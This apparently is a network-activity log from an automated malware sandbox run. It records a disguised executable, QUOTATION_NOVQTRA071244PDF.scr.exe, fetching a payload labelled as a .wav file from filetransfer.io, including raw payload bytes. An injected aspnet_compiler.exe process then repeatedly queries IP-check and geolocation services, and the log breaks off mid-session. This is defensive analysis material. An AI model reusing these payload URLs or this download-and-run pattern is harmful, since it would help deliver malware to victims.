                                                              Nov 20, 2024 08:19:00.774436951 CET | 192.168.2.4 | 1.1.1.1 | 0x1e2b | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
                                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                              Nov 20, 2024 08:18:10.163335085 CET | 1.1.1.1 | 192.168.2.4 | 0x3ca7 | No error (0) | filetransfer.io |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:10.163335085 CET | 1.1.1.1 | 192.168.2.4 | 0x3ca7 | No error (0) | filetransfer.io |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:12.431993008 CET | 1.1.1.1 | 192.168.2.4 | 0xff6c | No error (0) | s24.filetransfer.io |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:12.431993008 CET | 1.1.1.1 | 192.168.2.4 | 0xff6c | No error (0) | s24.filetransfer.io |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.780251980 CET | 1.1.1.1 | 192.168.2.4 | 0xc59c | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.780251980 CET | 1.1.1.1 | 192.168.2.4 | 0xc59c | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.780251980 CET | 1.1.1.1 | 192.168.2.4 | 0xc59c | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.780251980 CET | 1.1.1.1 | 192.168.2.4 | 0xc59c | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.780251980 CET | 1.1.1.1 | 192.168.2.4 | 0xc59c | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:18:59.780251980 CET | 1.1.1.1 | 192.168.2.4 | 0xc59c | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:19:00.781559944 CET | 1.1.1.1 | 192.168.2.4 | 0x1e2b | No error (0) | reallyfreegeoip.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                              Nov 20, 2024 08:19:00.781559944 CET | 1.1.1.1 | 192.168.2.4 | 0x1e2b | No error (0) | reallyfreegeoip.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                              • filetransfer.io
                                                              • s24.filetransfer.io
                                                              • reallyfreegeoip.org
                                                              • checkip.dyndns.org
                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.4 | 49730 | 188.114.96.3 | 80 | 7268 | C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:18:10.185219049 CET | 95 | OUT | GET /data-package/I7fmQg9d/download HTTP/1.1
                                                              Host: filetransfer.io
                                                              Connection: Keep-Alive
                                                              Nov 20, 2024 08:18:10.839596987 CET | 998 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Wed, 20 Nov 2024 07:18:10 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: keep-alive
                                                              Location: https://filetransfer.io/data-package/I7fmQg9d/download
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UGfzAKFeo8wGscCGgwjzxpokaZFnEhE3uqidqypbltJTkE7BaEii2GudxFsYkTEYK2Itr7mAsibXV%2FbiG5LeKAt%2FvclEviNubtNPqCL3Zc%2BZO8BYtAWN%2FEEINGM6yvy%2FNnQ%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56aa1c3c5f80dc-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8842&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=95&delivery_rate=0&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.4 | 49739 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:18:59.797810078 CET | 151 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 20, 2024 08:19:00.443377018 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: f2a4640bd76c3de6a137eeda510d48b2
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                              Nov 20, 2024 08:19:00.456357002 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:00.646150112 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 0790ca9d8795d6c4eff428b8158605fb
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
                                                              Nov 20, 2024 08:19:01.704252958 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:01.904439926 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: fe82a35d308ac37653c6623156ccb04a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.4 | 49742 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:19:02.556323051 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:03.202857971 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:03 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: cd19518daa69a8a854c1f4f2cfcf3500
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.4 | 49745 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:19:03.937967062 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:04.584526062 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:04 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 2ec2266d5bc0b6df3f03c8590cc14e1d
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.4 | 49758 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:19:05.236510038 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:05.871831894 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: a96b71f0018104dd21ccf3cefcfad079
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.4 | 49765 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:19:06.519090891 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:07.151909113 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:07 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 7a1783dee6aebf34890b443eae82d82a
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.4 | 49775 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:19:07.775638103 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:08.403659105 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:08 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: d2262bbb91e37efde6208a581b6883f3
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              7 | 192.168.2.4 | 49781 | 193.122.6.168 | 80 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Nov 20, 2024 08:19:09.244904995 CET | 127 | OUT | GET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Nov 20, 2024 08:19:09.870517015 CET | 320 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:09 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 103
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
                                                              Pragma: no-cache
                                                              X-Request-ID: 8e36383cd441bc6b4d38b1266da10f1d
                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              0 | 192.168.2.4 | 49731 | 188.114.96.3 | 443 | 7268 | C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:18:11 UTC | 95 | OUT | GET /data-package/I7fmQg9d/download HTTP/1.1
                                                              Host: filetransfer.io
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:18:12 UTC | 1252 | IN | HTTP/1.1 302 Found
                                                              Date: Wed, 20 Nov 2024 07:18:12 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: Nette Framework 3
                                                              X-Frame-Options: SAMEORIGIN
                                                              Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                              Set-Cookie: PHPSESSID=5hpapqh1fj2lnms9vnsl9egh6v; expires=Wed, 04-Dec-2024 07:18:12 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Pragma: no-cache
                                                              Vary: X-Requested-With
                                                              Location: https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR2IbzWvz3WWa7DhuA60UWCqoBbWGELq698bj%2FqeL3r70soZb2MnJvIulpqxxyfatdVaOvvBnjVhliKmEWYh1ovkBapsRYX1%2BpzWk%2BFSI%2B3bTBovx%2B3ntezgMSdT%2Bs%2By%2F8U%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56aa247b8f43e0-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1548&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=709&delivery_rate=1800246&cwnd=247&unsent_bytes=0&cid=827973cbb87fdb1a&ts=1086&x=0"
                                                              2024-11-20 07:18:12 UTC | 117 | IN | Data Ascii: 80<h1>Redirect</h1><p><a href="https://s24.filetransfer.io/storage/download/ndvzPJWaMUSB">Please click here to co
                                                              2024-11-20 07:18:12 UTC | 17 | IN | Data Ascii: ntinue</a>.</p>
                                                              2024-11-20 07:18:12 UTC | 5 | IN | Data Ascii: 0


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              1 | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\QUOTATION_NOVQTRA071244PDF.scr.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:18:12 UTC | 98 | OUT | GET /storage/download/ndvzPJWaMUSB HTTP/1.1
                                                              Host: s24.filetransfer.io
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:18:13 UTC | 1249 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:18:13 GMT
                                                              Content-Type: application/octet-stream
                                                              Content-Length: 1069568
                                                              Connection: close
                                                              Last-Modified: Tue, 19 Nov 2024 08:33:30 GMT
                                                              Set-Cookie: nette-samesite=1; path=/; SameSite=Strict; HttpOnly
                                                              Set-Cookie: PHPSESSID=1c3165a00cbddebe89ea15c6473c7760; expires=Wed, 04-Dec-2024 07:18:13 GMT; Max-Age=1209600; path=/; SameSite=Lax; secure; HttpOnly
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                              Content-Disposition: attachment; filename="Xvgfyu.wav"
                                                              Accept-Ranges: bytes
                                                              Accept-Ranges: bytes
                                                              ETag: "673c4d5a-105200"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xs0i3yd6aR0%2BSLd35CW9hm7Own8AzAf1l%2B0JHoUPExspOxJ8tZON21Mket%2BkpVopEm27VetUfgviYq4zKbBd5AO4cTbHOsX2DN%2BZ55bwSS%2FTYGHpJ%2B8b6uw2mZtV2EQUfxkI%2BVDx"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56aa2b2f12c44a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1686&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=712&delivery_rate=1615044&cwnd=223&unsent_bytes=0&cid=d577541a4244a320&ts=790&x=0"
                                                              Data Ascii: 1%6173141:111141811q2141f4111144141f114O6156475114OW615Oy3454114J3456121411JW345J3101411&11#141#41%1142<15411411411#p(114114141r611314141*410'24141041 3475114?414114=41t71141414411c114411J3456
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 71 32 31 34 31 34 34 31 31 1b 31 31 34 37 31 34 31 09 34 31 31 34 1b 4f b5 33 31 30 19 b6 33 31 37 14 31 31 34 31 4f 52 33 31 30 4a 47 36 31 35 0d fa ce cb ce 17 14 30 31 34 31 09 f4 ce ce cb 4f b3 36 31 35 1c ba 36 34 37 11 34 31 31 34 4f 57 36 31 35 4f 2c 33 34 35 0b 96 ce ce cb 17 11 34 31 31 34 09 a6 cb ce ce 26 31 31 23 1b 31 34 31 23 34 31 25 1e 31 31 34 23 31 34 27 1b 34 31 31 27 01 32 34 b1 31 34 31 30 34 31 20 1c fa 33 34 37 11 35 31 31 34 cf 3f 34 31 09 34 31 31 34 cf 3d 34 31 74 37 31 31 34 34 31 34 31 1e 34 31 31 1a 31 31 34 09 31 34 31 31 4a b3 33 34 35 19 bf 36 31 32 11 33 34 31 31 4a 57 33 34 35 4a 31 33 31 30 0b fd cb ce ce 12 11 33 34 31 31 0c f0 ce cb ce 1b 4a b0 33 34 35 19 b3 36 31 32 11 31 34 31 31 4a 57 33 34 35 4a 11 33 31 30 0b 93
                                                              Data Ascii: q2141441111471414114O3103171141OR310JG6150141O6156474114OW615O,3454114&11#141#41%114#14'411'24141041 3475114?414114=41t711441414111141411J3456123411JW345J13103411J3456121411JW345J310
                                                              2024-11-20 07:18:13 UTC1369INData Raw: 31 31 34 31 01 34 31 31 46 33 31 34 93 33 34 31 08 34 31 31 23 31 31 35 22 01 37 31 35 34 31 31 34 31 31 34 31 31 34 1b 22 04 32 31 b4 31 31 34 30 31 34 20 19 ff 33 31 32 11 33 34 31 31 ca 3f 31 34 09 31 34 31 31 ca 3d 31 34 74 32 34 31 31 31 31 31 34 37 31 34 31 1e 34 31 31 0c 31 31 34 31 1b 4a b3 33 34 35 19 bf 36 31 32 11 31 34 31 31 4a 57 33 34 35 4a 0d 33 31 30 0b fa cb ce ce 12 11 31 34 31 31 0c f1 ce cb ce 4f b5 33 31 30 19 b6 33 31 37 14 30 31 34 31 4f 52 33 31 30 4a 6b 36 31 35 0e 93 ce cb ce 17 14 30 31 34 31 09 a3 ce ce cb 13 31 20 94 15 34 31 30 1e 31 31 34 32 01 3d 31 39 34 31 31 34 31 31 34 31 25 91 15 31 34 30 1b 26 31 31 23 1b 31 34 31 23 34 31 26 1e 31 31 34 23 31 34 25 1b 34 31 31 37 01 39 34 35 31 34 31 31 34 31 31 34 31 31 1e 70 2d 34
                                                              Data Ascii: 1141411F314341411#115"7154114114114"21114014 3123411?141411=14t2411111471414111141J3456121411JW345J3101411O3103170141OR310Jk61501411 4101142=1941141141%140&11#141#41&114#14%41179451411411411p-4


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              2 | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:01 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:01 UTC | 848 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:01 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51050
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0P18bdRJbFCrmik73R3bwnKkGp5LIMyzldpcRuTjQtV9YuH%2BzOm02pwadrSYdtaF38YivTZEGBKp%2FJ1R9Esuy4gKQsotVv5jiRQznWJD95a60TAJfshEowesE7gqCYevqlZiJMd"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab59d8246a52-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1696687&cwnd=205&unsent_bytes=0&cid=babbba150893012e&ts=231&x=0"
                                                              2024-11-20 07:19:01 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              3 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:02 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-20 07:19:02 UTC | 852 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:02 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51051
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pL2zLdAjK%2BFx4sogOMuMkuqbnnMt7n3fppJUHm2Rqsk%2BsEfsVlvhJtRcmW19zsNJFDbmBz5QLWL8NLsXrOcYkNc99YZ3PCA%2BmUqGbqEaNdBDBbMMaUIP6jf%2BntsPkh6tCN2MHdMb"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab608957333c-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2031&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1447694&cwnd=247&unsent_bytes=0&cid=3c8e9631adf34ee0&ts=160&x=0"
                                                              2024-11-20 07:19:02 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              4 | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:03 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-20 07:19:03 UTC | 850 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:03 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51052
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0qnE5qpJdRVDxKsz3b4EBmKwGYXq%2B6NmQpp6VJo3mRiTwLnAXf%2BQjXmZpUwcGXkILTMvjT5%2FWJYfdEiWhiHgYV5oZGyHYHVHmcpSKYGTx6wGzd4Iqw7WaNt25DgxhiRSouCuMrLy"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab686fc1c360-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1468&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=698&delivery_rate=1891191&cwnd=138&unsent_bytes=0&cid=db1a8002970e5105&ts=149&x=0"
                                                              2024-11-20 07:19:03 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              5 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:05 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:05 UTC | 856 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:05 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51054
                                                              Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDfqdZ7zIH7H7hhoACAujs6UA9Tpku9Kr4SV%2BjtHGxYecaVE7vwVOv93FEba9%2FjdsddBrBH%2FOG7kdgy1AdukAWo%2FgHglHOftjwJC%2Bd0PxpnlmyD3J8%2BeOInGh6R6Nl1vqTuB6vc1"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e56ab714a4a5e76-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2116&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1400479&cwnd=221&unsent_bytes=0&cid=e2288ccb8e2f0ad8&ts=159&x=0"
                                                              2024-11-20 07:19:05 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              6 | 192.168.2.4 | 49764 | 188.114.97.3 | 443 | 7792 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-20 07:19:06 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-20 07:19:06 UTC | 864 | IN | HTTP/1.1 200 OK
                                                              Date: Wed, 20 Nov 2024 07:19:06 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 361
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 51055
